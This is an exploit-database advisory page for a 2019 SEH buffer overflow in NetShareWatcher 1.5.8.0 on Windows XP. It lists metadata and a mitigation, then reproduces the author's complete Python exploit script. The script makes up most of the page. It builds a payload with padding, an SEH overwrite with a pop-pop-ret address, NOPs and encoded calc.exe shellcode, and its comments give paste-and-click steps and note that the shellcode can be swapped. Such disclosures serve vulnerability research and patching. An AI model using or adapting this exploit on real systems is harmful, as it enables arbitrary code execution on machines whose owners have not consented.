NetShareWatcher 1.5.8.0 - SEH Buffer Overflow

vendor:

NetShareWatcher

by:

Peyman Forouzan

7.8

CVSS

HIGH

SEH Buffer Overflow

119

CWE

Product Name: NetShareWatcher

Affected Version From: 1.5.8.0

Affected Version To: 1.5.8.0

Patch Exists: YES

Related CWE: N/A

CPE: a:nsauditor:netsharewatcher

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows XP SP2 - SP3

2019

NetShareWatcher 1.5.8.0 – SEH Buffer Overflow

NetShareWatcher 1.5.8.0 is vulnerable to a SEH buffer overflow vulnerability. An attacker can exploit this vulnerability by running a malicious python code to create a file containing a payload of 262 bytes followed by a short jump, a pop esi pop ebx retn instruction, and 20 NOPs. The payload is then pasted into the 'Custom' box in the 'Restrictions' tab of the 'Settings' menu. When the 'Find' button is clicked, the payload is executed, resulting in the execution of arbitrary code.

Mitigation:

Upgrade to the latest version of NetShareWatcher.

Source

Exploit-DB raw data:

# Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow
# Date: 2019-03-19
# Vendor Homepage: http://netsharewatcher.nsauditor.com
# Software Link:  http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
# Exploit Author: Peyman Forouzan
# Tested Version: 1.5.8.0
# Tested on: Windows XP SP2 - SP3

# 1- Run python code : NetShareWatcher.py
# 2- Open Exploit.txt and copy content to clipboard
# 3- Open NetShareWatcher
# 4- Setting --> Defaults --> Restrictions --> Add --> Custome
# 5- Paste the content of Exploit.txt into the box
# 6- Click 'Find'
# 7- Calc.exe Open ( Can be replaced with Shellcode )

#!/usr/bin/python

buffer = "\x41" * 262
nseh = "\xeb\x14\x90\x90"  # Overwrite Next Seh With Short jmp
seh = "\x90\xBF\xC9\x74"   # Overwrite Seh / pop esi pop ebx retn [OLEACC.dll]
nops = "\x90" * 20

# Calc.exe payload [size 227]
buf =""
buf += "\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9"
buf += "\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92"
buf += "\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84"
buf += "\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e"
buf += "\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1"
buf += "\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27"
buf += "\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb"
buf += "\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b"
buf += "\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2"
buf += "\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37"
buf += "\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3"
buf += "\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef"
buf += "\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb"
buf += "\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf"
buf += "\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83"
buf += "\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3"
buf += "\x9a\xca\xc0";

payload = buffer + nseh + seh + nops + buf
try:
    f=open("Exploit.txt","w")
    print "[+] Creating %s bytes payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File can't be created"